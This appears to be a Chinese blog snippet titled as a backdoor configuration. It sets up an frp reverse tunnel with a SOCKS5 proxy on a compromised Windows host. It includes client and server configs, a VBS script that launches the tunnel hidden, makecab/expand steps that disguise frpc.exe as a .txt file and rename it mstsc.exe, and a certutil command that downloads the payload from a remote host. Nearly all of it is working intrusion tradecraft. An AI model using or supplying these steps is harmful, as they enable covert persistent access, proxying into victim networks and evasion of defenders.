后门文件配置:

#frpc.ini
[common]
server_addr = *.*.*.*
server_port = 7000
token = 123456

[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5
#frps.ini
[common]
bind_addr =0.0.0.0
bind_port =7000
token = 123456
#frpc.bat
frpc.exe -c frpc.ini

#frpc.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c frpc.bat",vbhide

压缩解压:
减少文件体积,提高文件上传速度,这里为了方便直接可以使用windows自带的压缩解压工具:

#压缩
makecab frpc.exe frpc.txt

#解压
expand C:\Users\RabbitMask\Desktop\test\frpc.txt C:\Users\RabbitMask\Desktop\test\mstsc.exe

远程下载:

certutil -urlcache -split -f http://192.168.1.1/frpc.txt  1.txt

相关文章:

  • 2021-12-14
  • 2022-02-08
  • 2022-02-06
  • 2021-12-30
  • 2021-07-25
猜你喜欢
  • 2022-12-23
  • 2022-01-28
  • 2021-11-18
  • 2022-12-23
  • 2021-05-26
  • 2022-01-07
相关资源
相似解决方案